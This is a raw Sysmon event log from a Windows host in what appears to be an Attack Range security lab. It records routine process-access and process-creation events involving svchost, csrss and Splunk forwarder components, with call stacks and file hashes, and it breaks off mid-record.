13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.236{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.736{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.205{59A5CD1D-90D0-6005-4301-00000000A301}48204852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program 